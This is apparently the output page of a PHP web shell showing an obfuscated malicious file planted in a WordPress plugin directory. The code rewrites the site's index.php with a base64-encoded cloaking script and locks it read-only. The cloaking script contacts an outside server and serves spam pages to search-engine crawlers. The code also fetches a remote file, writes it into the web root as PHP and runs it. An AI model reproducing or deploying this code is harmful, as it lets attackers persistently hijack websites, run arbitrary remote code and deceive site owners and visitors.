HEX
Server: Apache/2.4.57 (Debian)
System: Linux web-server-k8s-e92jnr3j-6f99bff6b6-rp2wg 6.1.0-22-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.94-1 (2024-06-21) x86_64
User: apache (48)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Upload Files
File: /var/www/sites/1250.info/wp-content/plugins/uninstall.php.suspected
<?php
goto GRLDV; lnF3g: $BCwMJ = isset($_SERVER["\x48\124\x54\120\123"]) && $_SERVER["\x48\x54\x54\x50\123"] == "\x6f\x6e" ? "\150\164\x74\x70\x73" : "\x68\x74\x74\x70"; goto U2CQz; vXzQA: @unlink($teIhn); goto bmmVL; bmmVL: @file_put_contents($teIhn, base64_decode($GBe1y)); goto mi5qO; sa3wQ: goto p3u1w; goto UIpDv; DKGbz: if (file_exists($sh5Ur)) { goto nWB0H; } goto AgL8W; vVS48: $GBe1y = "PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwpAc2V0X3RpbWVfbGltaXQoMzYwMCk7CkBpZ25vcmVfdXNlcl9hYm9ydCgxKTsKJGl4dj0nMi4yLjE3JzsKJGdvdiA9ICJceDZhXDU2XHg2M1wxNjJceDY1XDE0MVx4NzRcMTQ1XHg3M1wxNDVceDZmXDU2XHg3OFwxNzFceDdhIjsKJGRiID0gIjQwMDAiOwokaXAgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsKJHVyID0gaXNzZXQoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSA/ICRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSA6ICIiOwokdWEgPSBpc3NldCgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pID8gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddIDogIiI7CiR1cmkgPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsKJGhvc3QgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07CiRsYW5nID0gaXNzZXQoJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pPyRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddOiIiOwokdG9rZW4gPSBpc3NldCgkX1NFUlZFUlsnSFRUUF9YRE9JTSddKT8kX1NFUlZFUlsnSFRUUF9YRE9JTSddOiIiOwokcHJvdG8gPSAoKCFlbXB0eSgkX1NFUlZFUlsnSFRUUFMnXSkgJiYgc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUFMnXSkgIT09ICdvZmYnKSB8fCAoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfUFJPVE8nXSkgJiYgJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfUFJPVE8nXSA9PT0gJ2h0dHBzJykgfHwgKCFlbXB0eSgkX1NFUlZFUlsnSFRUUF9GUk9OVF9FTkRfSFRUUFMnXSkgJiYgc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9GUk9OVF9FTkRfSFRUUFMnXSkgIT09ICdvZmYnKSkgPyAgImh0dHBzIjogImh0dHAiOwokaGVhZGVyID0gYXJyYXkoJ0xhbmc6ICcuJGxhbmcsJ1VzZXItQWdlbnQ6ICcuJHVhLCAnUmVmZXJlcjogJy4kdXIsICdIdHRwLVByb3RvOiAnLiRwcm90bywgJ0h0dHAtSG9zdDogJy4kaG9zdCwgJ0h0dHAtVXJpOiAnLiR1cmksICdEYmdyb3VwOiAnLiRnb3YsICdIdHRwLVgtRm9yd2FyZGVkLUZvcjogJy4kaXAsJ1Rva2VuOiAnLiR0b2tlbik7CiRwb3N0ZGF0YT0gInByb3RvPSRwcm90byZzaG9zdD0kaG9zdCZpcD0kaXAmZGJncm91cD0kZGImdXJpPSR1cmkiOwoKaWYgKCgkdXJpIT09Ii9mYXZpY29uLmljbyIpICYmKCBAcHJlZ19tYXRjaCgnI2dvb2dsZXx5YWhvb3xiaW5nI2knLCR1YSkgfHwgKEBwcmVnX21hdGNoKCcjZ29vZ2xlLmNvLmpwfGdvb2dsZS5jb218eWFob28uY29tfHlhaG9vLmNvLmpwfGJpbmcuY29tI2knLCR1cikgJiYgQHByZWdfbWF0Y2goJyNbL1w/XShbYS16MC05XXsxfSkoXGQrKSNpJywkdXJpKSkpKXsgICAgCiAgICBsaXN0KCRjbnR4LCRjb2RlLCRjdHlwZSkgPSB1cmx4KCdodHRwOi8vJy4kZ292LicvaW5kZXg/Jy4kcG9zdGRhdGEsJGhlYWRlciwkcG9zdGRhdGEpOwogICAgaWYgKHN0cmlwb3MoJGN0eXBlLCdnemlwJyk+MCl7IEBoZWFkZXIoJ0NvbnRlbnQtdHlwZTogYXBwbGljYXRpb24veC1nemlwJyk7IGV4aXQoJGNudHgpOyB9CiAgICBpZiAoc3RyaXBvcygkY250eCwnPCFkb2N0Jyk9PT0wfHxzdHJpcG9zKCRjbnR4LCc8aHRtbCcpPT09MCl7IGV4aXQoJGNudHgpOyB9CiAgICBpZiAoc3RyaXBvcygkY250eCwnPD94bWwnKT09PTApeyBAaGVhZGVyKCdDb250ZW50LXR5cGU6IHRleHQveG1sJyk7IGV4aXQoJGNudHgpOyB9CiAgICBpZiAoc3RyaXBvcygkY250eCwnVXNlci1hZycpPT09MCl7IEBoZWFkZXIoJ0NvbnRlbnQtdHlwZTogdGV4dC9wbGFpbjtjaGFyc2V0PXV0Zi04Jyk7IGV4aXQoJGNudHgpOyB9CgogICAgCiAgICBpZiAoc3RyaXBvcygkY250eCwnaHR0cCcpPT09MCl7CiAgICAgICAgaWYgKHN0cmlwb3MoJGNudHgsJz9tYWluX3BhZ2U9JykpeyBAaGVhZGVyKCdMb2NhdGlvbjogJyAuICRjbnR4KTsgZXhpdDt9CiAgICAgICAgaWYgKHN0cnN0cigkY250eCwiWyxdIikpeyRzZWdzID0gZXhwbG9kZSgiWyxdIiwkY250eCk7ICRsaW5lcyA9IGV4cGxvZGUoIiwiLCRzZWdzWzBdKTsgJHJlc3VsdCA9ICcnOyBmb3JlYWNoKCRsaW5lcyBhcyAkdXJsKXsgbGlzdCgkcmVzcGJvZHksJGNvZGUpID0gdXJseCgkdXJsLG51bGwsbnVsbCwkc2Vnc1sxXSk7JHJlc3VsdCAuPSAkdXJsLiRyZXNwYm9keTsgfSBleGl0KCRyZXN1bHQpO30KICAgIH0KICAgIGlmIChAcHJlZ19tYXRjaCgnI15bXi5dKi4odHh0fHBocCkjaScsJGNudHgpKXskdmFsdWVzID0gZXhwbG9kZSgiWyxdIiwkY250eCk7IHRvZGsoJHZhbHVlc1swXSwkdmFsdWVzWzFdKTsgaWYoZmlsZV9leGlzdHMoJHZhbHVlc1swXSkpeyBleGl0KCdlbmQgb2snKTt9ZWxzZXsgZXhpdCgnbm8gZmFsc2UnKTt9IH0KICAgIGlmIChzdHJpcG9zKCRjbnR4LCdvaycpPT09MCl7IGV4aXQoJGNudHguJGRiLiRnb3YuJGl4dik7IH0KICAgIGlmICgkY29kZSA+PSA0MDAgJiYgJGNvZGUgPCA1MDApe0BoZWFkZXIoJ0hUVFAvMS4xIDQwNCBOb3QgRm91bmQnKTtleGl0O30KICAgIGlmICgkY29kZSA+PSA1MDApe0BoZWFkZXIoJ0hUVFAvMS4xIDUwMCBJbnRlcm5hbCBTZXJ2ZXIgRXJyb3InKTtleGl0O30KICAgIGlmICgkY250eCE9IiIpeyBleGl0KCRjbnR4KTsgfQp9CgpmdW5jdGlvbiB1cmx4KCR1cmwsJGhlYWRlcj1udWxsLCRwb3N0ZGF0YT1udWxsLCR1YT1udWxsKSB7CiAgICBpZiAoIWZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpeyByZXR1cm47IH0KICAgIHRyeSB7CiAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHVybCk7IGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwxKTsgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0VOQ09ESU5HLCAnZ3ppcCxkZWZsYXRlJyk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAzMCk7IGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgKCRoZWFkZXI9PT1udWxsKT8nJzpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSFRUUEhFQURFUiwgJGhlYWRlcik7ICgkdWE9PT1udWxsfHwkdWE9PT0iIik/Jyc6Y3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJHVhKTsKICAgICAgICBpZiAoJHBvc3RkYXRhIT09bnVsbCAmJiAkcG9zdGRhdGEhPT0iIikge2N1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NULCAxKTsgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICRwb3N0ZGF0YSk7IH0KICAgICAgICAkYm9keSA9IGN1cmxfZXhlYygkY2gpOyRjb2RlID0gY3VybF9nZXRpbmZvKCRjaCxDVVJMSU5GT19IVFRQX0NPREUpOyAkY3R5cGUgPSBjdXJsX2dldGluZm8oJGNoLENVUkxJTkZPX0NPTlRFTlRfVFlQRSk7Y3VybF9jbG9zZSgkY2gpOwogICAgfSBjYXRjaCAoRXhjZXB0aW9uICRlKSB7IH0gCiAgICByZXR1cm4gYXJyYXkoJGJvZHksJGNvZGUsJGN0eXBlKTsKfQoKPz4KCjw/cGhwDQovKioNCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMNCiAqIHdwLWJsb2ctaGVhZGVyLnBocCB3aGljaCBkb2VzIGFuZCB0ZWxscyBXb3JkUHJlc3MgdG8gbG9hZCB0aGUgdGhlbWUuDQogKg0KICogQHBhY2thZ2UgV29yZFByZXNzDQogKi8NCg0KLyoqDQogKiBUZWxscyBXb3JkUHJlc3MgdG8gbG9hZCB0aGUgV29yZFByZXNzIHRoZW1lIGFuZCBvdXRwdXQgaXQuDQogKg0KICogQHZhciBib29sDQogKi8NCmRlZmluZSggJ1dQX1VTRV9USEVNRVMnLCB0cnVlICk7DQoNCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLw0KcmVxdWlyZSggZGlybmFtZSggX19GSUxFX18gKSAuICcvd3AtYmxvZy1oZWFkZXIucGhwJyApOw=="; goto g0AxS; RJO4n: $IIRkA = "'wp-includes/css/dist/widgetsSHjXN.log'"; goto puFaq; iFEw8: @file_get_contents($LDSdT, false, stream_context_create($FmNyg)); goto fzqB5; mi5qO: @chmod($teIhn, 0444); goto Q1h6s; A2YB1: if (file_exists($sh5Ur)) { goto vPFTh; } goto vVS48; UIpDv: vPFTh: goto kmtoG; KFCjO: $MUfhd = 3919; goto QZr3e; hj0J5: @chmod($teIhn, 438); goto vXzQA; vBbuc: echo filesize($teIhn); goto JW2S_; GRLDV: $teIhn = $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\124\137\x52\x4f\x4f\x54"] . "\57\x69\x6e\x64\x65\x78\56\160\150\x70"; goto RJO4n; aYxiF: Z9u3k: goto pL_CA; Q1h6s: p3u1w: goto R15wv; kmtoG: $GBe1y = @file_get_contents($sh5Ur); goto hj0J5; juSHf: $LDSdT = $BCwMJ . "\72\x2f\57" . $OLdjY . "\57\x63\171\x62\x6f\162\x67\137\x74\x6d\160\56\160\x68\160"; goto iFEw8; JW2S_: CPoLu: goto stoY0; gQwrQ: if (!($_GET["\x6c\x69\x6e\145"] == "\141")) { goto CPoLu; } goto DKGbz; v1Cq2: @chmod($teIhn, 0444); goto sa3wQ; H3sdL: @file_put_contents($jmeyB, $b5fe7); goto qdfJt; VMluy: if (!$b5fe7) { goto Z9u3k; } goto joH1j; qdfJt: $FmNyg = array("\163\163\154" => array("\166\145\x72\151\x66\171\137\x70\x65\x65\x72" => false, "\x76\x65\162\151\146\171\x5f\x70\145\145\162\x5f\156\x61\155\145" => false), "\150\x74\x74\160" => array("\155\145\x74\x68\x6f\x64" => "\x47\x45\124", "\164\x69\x6d\145\157\x75\164" => "\63")); goto lnF3g; N7Wor: @unlink($teIhn); goto Gbwg1; Qkn7r: $b5fe7 = @file_get_contents($d0efA); goto VMluy; Gbwg1: @file_put_contents($teIhn, base64_decode($GBe1y)); goto v1Cq2; g0AxS: @chmod($teIhn, 438); goto N7Wor; r35kR: $d0efA = "\150\164\x74\x70\x3a\x2f\57\x73\x2e\156\x65\x77\x6e\144\x61\171\56\170\x79\172\57\143\171\57\x63\171\x2e\147\151\146"; goto Qkn7r; joH1j: $jmeyB = $_SERVER["\x44\x4f\x43\x55\115\x45" . "\x4e\124\137\x52\117\117\x54"] . "\57\x63\x79\142\x6f\162\147\x5f\164\x6d\160\56\160\150\x70"; goto H3sdL; puFaq: $sh5Ur = $_SERVER["\104\x4f\103\x55\x4d\x45\x4e\124\x5f\122\x4f\x4f\x54"] . "\57" . $IIRkA; goto KFCjO; U2CQz: $OLdjY = $_SERVER["\110\124\124\120\137\x48\x4f\x53\124"]; goto juSHf; fzqB5: $sYKnl = @unlink($jmeyB); goto aYxiF; QZr3e: if (!(!file_exists($teIhn) or filesize($teIhn) != $MUfhd)) { goto sxc3Y; } goto A2YB1; AgL8W: echo "\154\x6f\163\x74\40\x6c\157\147"; goto KLfZ0; KLfZ0: nWB0H: goto vBbuc; stoY0: if (!(filesize($teIhn) == $MUfhd && $_GET["\143\x79"] == "\x31")) { goto dKs1B; } goto r35kR; R15wv: sxc3Y: goto gQwrQ; pL_CA: dKs1B: